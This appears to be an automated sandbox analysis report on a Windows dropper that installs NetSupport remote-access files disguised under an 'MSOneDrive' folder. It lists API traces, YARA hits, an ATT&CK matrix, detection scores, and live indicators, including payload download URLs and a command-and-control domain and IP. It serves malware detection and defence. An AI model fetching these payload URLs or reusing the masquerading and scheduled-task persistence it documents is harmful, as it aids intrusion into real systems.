Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_111623B0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_11162470
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_111624D7
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,11_2_6C82ECA9
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_6C82FC28
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_6C82FDF9
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: EnumSystemLocalesA,11_2_6C82FEC1
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_6C82FEE5
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,11_2_6C82FF88
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,11_2_6C82EFC7
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_6C82FF4C
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,11_2_6C83B8EF
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,11_2_6C82D84F
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,11_2_6C83B9C9
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoA,11_2_6C83BA0C
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_6C82FA31
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,13_2_11162513
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoA,13_2_11159D6E
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_11161FE8
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,13_2_11162184
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,13_2_111621DF
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,13_2_111620DD
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,13_2_111623B0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11162470
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_111624D7
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110E8280 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,11_2_110E8280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C87771 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00C87771
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11039030 _calloc,GetUserNameA,_free,_calloc,_free,11_2_11039030
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11163293 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,11_2_11163293
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11134460 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,11_2_11134460
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110CD1D0 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,11_2_110CD1D0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1106AC40 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_1106AC40
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_6C8090A0 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,LeaveCriticalSection,GetTickCount,InterlockedExchange,11_2_6C8090A0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_110CD1D0 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,13_2_110CD1D0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1106AC40 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,13_2_1106AC40
Source: Yara match | File source: 13.0.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.6cb70000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.6cb70000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.6cb40000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.6cb40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: client32.exe PID: 7384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 7512, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, type: DROPPED
MITRE ATT&CK matrix (one column per tactic; a leading number is the count shown on the page for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 14 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Windows Service | 2 Valid Accounts | 1 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 21 Access Token Manipulation | 1 Timestomp | NTDS | 33 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Windows Service | 1 DLL Side-Loading | LSA Secrets | 31 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 23 Process Injection | 1 Masquerading | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Virtualization/Sandbox Evasion
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron23
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Behavior Graph ID: 1514955 | Sample: SecuriteInfo.com.Win32.Drop... | Startdate: 21/09/2024 | Architecture: WINDOWS | Score: 80

Start
• DNS/IP: armayalitim.com; mlm-cdn.com; 2 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Machine Learning detection for sample; AI detected suspicious sample
• Started: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe 48; client32.exe

SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe 48
• DNS/IP: mlm-cdn.com 142.11.212.184, 443, 49700, 49701 HOSTWINDSUS United States
• Dropped: C:\Users\user\AppData\Local\...\wfapigp.dll, PE32; C:\Users\user\AppData\...\remcmdstub.exe, PE32; C:\Users\user\AppData\Local\...\pcicapi.dll, PE32; 22 other files (2 malicious)
• Signatures: Found evasive API chain (may stop execution after checking mutex); Uses schtasks.exe or at.exe to add and modify task schedules
• Started: client32.exe 17; schtasks.exe 1

client32.exe 17
• DNS/IP: armayalitim.com 37.1.209.225, 443, 49704, 63016 HVC-ASUS Ukraine; geo.netsupportsoftware.com 172.67.68.212, 49705, 80 CLOUDFLARENETUS United States
• Signatures: Contains functionality to change the wallpaper; Delayed program exit found

schtasks.exe 1
• Started: conhost.exe

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | 68% | ReversingLabs | Win32.Trojan.Madokwa | -
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | 55% | Virustotal | - | Browse
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | 100% | Joe Sandbox ML | - | -
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLL | 4% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL | 2% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL | 7% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\client32.exe | 12% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\getuname.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\icmp.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\ir41_qcx.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\ir50_32.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\msvcp140_codecvt_ids.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\msvcr100.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\msvcr100_clr0400.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\remcmdstub.exe | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\wfapigp.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\wiatrace.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\winrsmgr.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\MSOneDrive\winrssrv.dll | 0% | ReversingLabs | - | -
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
geo.netsupportsoftware.com | 4% | Virustotal | - | Browse
mlm-cdn.com | 1% | Virustotal | - | Browse
armayalitim.com | 0% | Virustotal | - | Browse
Source | Detection | Scanner | Label | Link
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe | -
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe | -
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe | -
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe | -
https://sectigo.com/CPS0 | 0% | URL Reputation | safe | -
http://ocsp.thawte.com0 | 0% | URL Reputation | safe | -
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe | -
http://geo.netsupportsoftware.com/location/loca.asp | 0% | Avira URL Cloud | safe | -
http://www.netsupportsoftware.com | 0% | Avira URL Cloud | safe | -
http://%s/testpage.htmwininet.dll | 0% | Avira URL Cloud | safe | -
http://www.netsupportschool.com/tutor-assistant.asp118 | 0% | Avira URL Cloud | safe | -
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | 0% | Avira URL Cloud | safe | -
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe | -
http://www.pci.co.uk/supportsupport | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDrive | 0% | Avira URL Cloud | safe | -
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | 0% | Virustotal | - | Browse
http://127.0.0.1RESUMEPRINTING | 0% | Avira URL Cloud | safe | -
http://geo.netsupportsoftware.com/location/loca.aspO | 0% | Avira URL Cloud | safe | -
http://www.netsupportsoftware.com | 1% | Virustotal | - | Browse
http://%s/testpage.htm | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDrive | 1% | Virustotal | - | Browse
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r | 0% | Avira URL Cloud | safe | -
http://www.netsupportschool.com/tutor-assistant.asp118 | 0% | Virustotal | - | Browse
https://mlm-cdn.com/ssd/sdn1.zip | 0% | Avira URL Cloud | safe | -
http://geo.netsupportsoftware.com/location/loca.aspO | 0% | Virustotal | - | Browse
http://geo.netsupportsoftware.com/location/loca.aspT | 0% | Avira URL Cloud | safe | -
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r | 0% | Virustotal | - | Browse
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | Avira URL Cloud | safe | -
http://www.pci.co.uk/supportsupport | 0% | Virustotal | - | Browse
http://%s/fakeurl.htm | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn1.zipl | 0% | Avira URL Cloud | safe | -
http://crl.microso | 0% | Avira URL Cloud | safe | -
http://geo.netsupportsoftware.com/location/loca.aspT | 0% | Virustotal | - | Browse
https://sectigo.com/CPS0B | 0% | Avira URL Cloud | safe | -
http://geo.netsupportsoftware.com/location/loca.asp | 4% | Virustotal | - | Browse
https://sectigo.com/CPS0C | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/1 | 0% | Avira URL Cloud | safe | -
https://sectigo.com/CPS0D | 0% | Avira URL Cloud | safe | -
https://sectigo.com/CPS0C | 0% | Virustotal | - | Browse
http://www.netsupportschool.com/tutor-assistant.asp | 0% | Avira URL Cloud | safe | -
https://sectigo.com/CPS0B | 0% | Virustotal | - | Browse
https://mlm-cdn.com/ssd/sdn1.zip | 1% | Virustotal | - | Browse
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# | 0% | Avira URL Cloud | safe | -
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | Virustotal | - | Browse
https://mlm-cdn.com/ssd/sdn2.zip2a | 0% | Avira URL Cloud | safe | -
https://sectigo.com/CPS0D | 0% | Virustotal | - | Browse
https://mlm-cdn.com/ | 0% | Avira URL Cloud | safe | -
http://www.pci.co.uk/support | 0% | Avira URL Cloud | safe | -
http://www.crossteccorp.com | 0% | Avira URL Cloud | safe | -
http://www.netsupportschool.com/tutor-assistant.asp | 0% | Virustotal | - | Browse
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# | 0% | Virustotal | - | Browse
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ | 1% | Virustotal | - | Browse
https://mlm-cdn.com/ssd/sdn4.zip | 0% | Avira URL Cloud | safe | -
http://127.0.0.1 | 0% | Avira URL Cloud | safe | -
http://www.pci.co.uk/support | 0% | Virustotal | - | Browse
https://mlm-cdn.com/ssd/sdn4.zipj | 0% | Avira URL Cloud | safe | -
http://www.symauth.com/cps0( | 0% | Avira URL Cloud | safe | -
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | Virustotal | - | Browse
http://geo.netsupportsoftware.com/ | 0% | Avira URL Cloud | safe | -
http://37.1.209.225/fakeurl.htm | 0% | Avira URL Cloud | safe | -
http://127.0.0.1 | 1% | Virustotal | - | Browse
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | Avira URL Cloud | safe | -
http://www.symauth.com/cps0( | 0% | Virustotal | - | Browse
https://mlm-cdn.com/ssd/sdn3.zip | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn4.zip | 1% | Virustotal | - | Browse
http://www.symauth.com/rpa00 | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn4.zipom/ssd/sdn3.zipe4$ | 0% | Avira URL Cloud | safe | -
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | Avira URL Cloud | safe | -
http://www.crossteccorp.com | 0% | Virustotal | - | Browse
https://mlm-cdn.com/k | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn2.zip | 0% | Avira URL Cloud | safe | -
https://mlm-cdn.com/ssd/sdn4.zipL | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 172.67.68.212 | true | false | - | unknown
mlm-cdn.com | 142.11.212.184 | true | false | - | unknown
armayalitim.com | 37.1.209.225 | true | true | - | unknown
armayalitim1722.com | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geo.netsupportsoftware.com/location/loca.asp | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://mlm-cdn.com/ssd/sdn1.zip | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://mlm-cdn.com/ssd/sdn4.zip | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://37.1.209.225/fakeurl.htm | true | Avira URL Cloud: safe | unknown
https://mlm-cdn.com/ssd/sdn3.zip | false | Avira URL Cloud: safe | unknown
https://mlm-cdn.com/ssd/sdn2.zip | false | Avira URL Cloud: safe | unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.netsupportsoftware.comPCICL32.DLL.3.drfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://%s/testpage.htmwininet.dllclient32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.netsupportschool.com/tutor-assistant.asp118client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.sectigo.com0remcmdstub.exe.3.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.pci.co.uk/supportsupportclient32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDriveSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://127.0.0.1RESUMEPRINTINGclient32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspOclient32.exe, 0000000B.00000002.3743777363.00000000010C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://%s/testpage.htmclient32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0rremcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspTclient32.exe, 0000000B.00000002.3743777363.0000000001146000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000003.1671103639.0000000001146000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#pcicapi.dll.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
